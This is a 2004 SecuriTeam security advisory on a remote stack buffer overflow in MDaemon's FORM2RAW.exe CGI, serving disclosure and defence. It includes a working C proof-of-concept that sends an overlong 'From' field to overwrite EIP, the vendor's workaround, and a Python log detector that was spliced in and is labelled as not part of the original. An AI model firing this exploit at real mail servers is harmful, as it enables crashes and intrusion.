[NT] Remote Buffer Overflow in MDaemon (Raw Message Handler)
From: SecuriTeam (support_at_securiteam.com)
Date: 01/01/04
To: list@securiteam.com Date: 1 Jan 2004 17:58:59 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Remote Buffer Overflow in MDaemon (Raw Message Handler)
------------------------------------------------------------------------
SUMMARY
"MDaemon (http://shop.mdaemontools.com/mdaemon.php) offers a full range
of mail server functionality. MDaemon protects your users from spam and
viruses, provides full security, includes seamless web access to your
email via WorldClient, remote administration, and much more!"
FORM2RAW.exe is a CGI that allows users to send email through MDaemon
from a web page. It processes the fields of an HTML form and creates a raw
message file in the raw queue directory of the MDaemon mail server. This
file is then processed and queued for delivery by MDaemon. An attacker can
cause a buffer overflow in MDaemon by issuing a malformed CGI request to
FORM2RAW.exe.
DETAILS
Vulnerable Systems:
* MDaemon 6.85 and prior to 6.52
According to the Help file: "By default, MDaemon 6.52 or higher will not
send emails created by Form2Raw unless the email address passed in the
'from' tag (see below) is a valid account on the MDaemon server. If you
want to disable this behavior you can set FromCheck=No in the FORM2RAW.INI
file."
Sending more than 153 bytes in the "From" field to FORM2RAW.exe creates a
raw file that, when processed by MDaemon, causes a stack buffer overflow.
The EIP register is overwritten when the From field is 249 bytes long.
FORM2RAW.exe is accessible on any default installation of the WorldClient
web server (usually listening on port 3000).
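A defender-side check derived from the figures above, added here as an example (it is not part of the advisory or of MDaemon): it scans constructed WorldClient-style access log lines for form2raw.cgi requests whose decoded From parameter exceeds the 153-byte overflow threshold and marks those reaching the 249-byte EIP-overwrite length. The log format and the thresholds' use as detection cut-offs are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Figures from the advisory: more than 153 bytes in "From" overflows the
# stack buffer; at 249 bytes the saved EIP is overwritten.
OVERFLOW_LEN = 153
EIP_LEN = 249

# Constructed sample access log lines (assumed common-log-style format).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2004:17:58:59 +0200] "GET /form2raw.cgi?From=alice@example.com'
    '&To=bob@example.com&Subject=hi&Body=hello HTTP/1.0" 200 -',
    '10.0.0.9 - - [01/Jan/2004:18:01:10 +0200] "GET /form2raw.cgi?From=' + 'a' * 200 +
    '&To=bob@example.com&Subject=hi&Body=hello HTTP/1.0" 200 -',
    '10.0.0.9 - - [01/Jan/2004:18:01:11 +0200] "GET /form2raw.cgi?From=' + 'a' * 244 +
    'bbbbc&To=bob@example.com&Subject=hi&Body=hello HTTP/1.0" 200 -',
    '10.0.0.7 - - [01/Jan/2004:18:02:00 +0200] "GET /WorldClient.dll?View=Main HTTP/1.0" 200 -',
]

REQUEST_RE = re.compile(r'"(?P<method>[A-Za-z]+) (?P<target>\S+) HTTP/[\d.]+"')


def classify_request(line):
    """Return None for benign lines, else (client_ip, from_len, severity)."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if parts.path.lower() != "/form2raw.cgi":
        return None
    # parse_qs URL-decodes values, so percent-encoded padding is measured
    # at the size the CGI actually writes into the raw file.
    params = {k.lower(): v for k, v in
              parse_qs(parts.query, keep_blank_values=True).items()}
    from_len = max((len(v) for v in params.get("from", [])), default=0)
    if from_len <= OVERFLOW_LEN:
        return None
    severity = "eip-overwrite-range" if from_len >= EIP_LEN else "overflow"
    return (line.split(" ", 1)[0], from_len, severity)


def scan(lines):
    """Run classify_request over every line and keep only the hits."""
    return [hit for hit in (classify_request(l) for l in lines) if hit]


if __name__ == "__main__":
    for ip, length, severity in scan(SAMPLE_LOG):
        print(f"{ip}: From={length} bytes ({severity})")
```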
Exploit:
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock.h>
#pragma comment (lib,"ws2_32")
#define RET 0x1dff160
#define PORT 3000

void main(int argc, char **argv)
{
    SOCKET s = 0;
    WSADATA wsaData;

    if(argc < 2)
    {
        fprintf(stderr, "MDaemon form2raw.cgi Exploit Written by Behrang Fouladi, "
                        "\nUsage: %s <target ip> \n", argv[0]);
        printf("%d",argc);
        exit(0);
    }

    WSAStartup(MAKEWORD(2,0), &wsaData);
    s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(INVALID_SOCKET != s)
    {
        SOCKADDR_IN anAddr;
        anAddr.sin_family = AF_INET;
        anAddr.sin_port = htons(PORT);
        anAddr.sin_addr.S_un.S_addr = inet_addr(argv[1]);

        if(0 == connect(s, (struct sockaddr *)&anAddr, sizeof(struct sockaddr)))
        {
            static char buffer[500];
            int i;
            memset(buffer,0,sizeof(buffer));
            strcpy(buffer,"get /form2raw.cgi?From=");
            for(i=0;i<244;i++) {
                strcat(buffer,"a");
            }
            strcat(buffer,"bbbb"); //Overwrites EIP
            strcat(buffer,"c");    //One byte left after ESP :-(
            strcat(buffer,"&To=me@hell.org&Subject=hi&Body=hello HTTP/1.0\r\n\r\n");
            send(s, buffer, strlen(buffer), 0);
            printf("Exploit Sent.");
        }
        else printf("Error Connecting to The Target.\n");
        closesocket(s);
    }
    WSACleanup();
}
Vendor Response (Patch):
Robin Edwards (support@helpdesk.altn.com) wrote: We have had a
similar vulnerability report with Form2Raw and hope to release a patch
soon. In the meantime it is easy to disable Form2Raw by following the
instructions below:
To disable FORM2RAW open the
\MDaemon\WorldClient\WorldClient.ini file with Notepad and
delete the following two lines:
CgiBase2=/Form2Raw.cgi
CgiFile2=C:\MDaemon\CGI\Form2Raw.exe
Afterward, restart WorldClient to register the change.
ADDITIONAL INFORMATION
The information has been provided by the Hat-Squad Security Team
(service@hat-squad.com).
The original advisory can be found at:
http://hat-squad.com/bugreport/mdaemon-raw.txt